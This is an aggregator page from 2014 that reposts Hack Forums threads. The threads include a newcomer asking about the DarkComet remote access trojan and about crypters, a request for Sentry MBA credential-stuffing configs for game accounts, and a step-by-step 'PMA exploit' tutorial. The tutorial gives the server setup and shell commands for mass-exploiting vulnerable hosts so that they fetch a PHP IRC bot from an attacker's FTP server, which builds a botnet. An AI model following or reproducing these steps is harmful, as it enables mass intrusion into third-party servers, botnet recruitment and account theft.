Friday, October 24, 2014

Hack Forums - Hacking Tutorials

Hack Forums - Hacking Tutorials


Very interested..

Posted: 24 Oct 2014 06:26 AM PDT

Greetings, I'm new to this, I was wondering a few things.

I've been looking into Kali Linux as I only have ever known Windows.

Now my question is, what steps or what could I do to have 2 different OS on my computer? I've heard a little about Virtual Box or something in that area. Now my question, is that safe?

I'm also trying to go completely dark from the interwebz. How do I achieve this?
Which paid/free product below do you think is best in your own opinion?

-VPN (One that doesn't leave logs)
-Browser
-HDD Encryption
-E-mail (Which is best for anonymity)
-Keystroke Encryption
(Is there anything I am missing in the list above?)

Now another question.
Paid/Free Hack Tools (Ethical Hacking of course)

-Is DarkComet still a good RAT to use?
-Is there a paid/free Crypter/Binder that is reliable and expected not to shut down after 2 months of operation.

What is the most recommended language to learn while getting into beginner hacking? Any particular order? I'm not looking to become UB3R L33t z0m5 H4x0r overnight, I understand it's going to take some dedication and work on my part. So I'm looking for a solid foundation to start from to build my skill level on.

Is there anything else I should look into that maybe I've forgotten?

Thanks for looking.[/size]

Free League of Legends Sentry MBA configs

Posted: 24 Oct 2014 01:25 AM PDT

Hey there!

I have been looking high and low for LoL OCE config and cant find anything that is free, if anyone could link/provide free OCE config i would be very appreciative of that. However if this is not possible, thank you for reading the post XD

PMA Exploit Setup Tutorial (Noob Friendly & Screen shots)

Posted: 23 Oct 2014 09:02 PM PDT

Hello HF users, I've been seeing a lot of questions on PMA recently.
It's really bugging me, & I havn't seen a single actual good tutorial.
There are a few OK ones, but they all leave things out, or use inferior methods.
So I'm gonna explain the easiest and quickest way to setup PMA.

First thing is first, you're gonna need to have an IRC setup and running.
If you don't know how to setup a IRC, I made a step by step tutorial that is also noob friendly. http://www.hackforums.net/showthread.php?tid=4503815

Once you have your IRC running, you're going to need two more servers.
One as a exploit server, and one as a FTP server.
A good and cheap exploit server is the $20 dedicated server, or any of them. http://volumedrive.com/vdrive/?a=dedicated
But note that the server will take 3-5 days to come in.
A good ftp server would be the $3 OVH classic vps package
https://us.ovh.com/us/cgi-bin/newOrder/o...del=model1

Now on the exploit server, you need to type 'yum install gcc make perl cpan nano -y'
Or if you have a server that uses apt-get, then just type 'apt-get install gcc make perl cpan nano -y'

Once those packages are done installing, tpy 'cpan -fi Parallel::ForkManager URI LWP Time::HiRes'
Now all you have to do is press enter when it prompts you to
Now you're going to need WinSCP or Filezilla, I recomePMAnd WinSCP.
I'm sure you know how to use your FTP client, so I'm not gonna go there.
But a brief overview, put your PMA files on the exploit server.
Now you're going to need a php bot.
There are plenty of public php bots, just get one of those.
Now once you have your php bot configured to your irc, on your FTP server type 'yum install vsftpd -y && service vsftpd start' or apt-get if you have it.
Now login to your FTP server with your FTP client, and go to the /var/ftp directory.
Once there, drag and drop your bot into that directory.
It should look something like this

[Image: 5cbcd85a288abfc05f07c4017a785bf5.png]


Now, get the PMA files if you don't already have them from here https://www.dropbox.com/s/7dlt528hvharmf...ar.gz?dl=0

Once you have the PMA files on your computer, you need to put them in the desired directory.
Now once in the directory, 'type tar -xf PMA.tar.gz && cd PMA'

ok, now heres when you need your FTP servers IP, get the servers IP and then back on the exploit server type 'nano x'
Now you should see this


[Image: 2eaf13b7f365cb87cda8e549684d65ce.png]


Now hit 'CTRL + w' on your keyboard and type 'ftp' and hit enter
Now you should see this


[Image: 0abea04df063eab7120958f1b40c75d8.png]


Change the 1.1.1.1 in 'ftp://1.1.1.1/Bot.php' to your FTP servers ip, and change the Bot.php part to the name of your php bot.
So if my servers IP is 129.65.32.10 and my bots name is Lol.php
then it should look like this 'ftp://129.65.32.10/Lol.php'
Now type 'CTRL + x' and then hit y and then hit enter
Now type 'perl x -x' and hit enter and there you go, you should be exploiting.

If you have any questions, feel free to ask.

No comments:

Post a Comment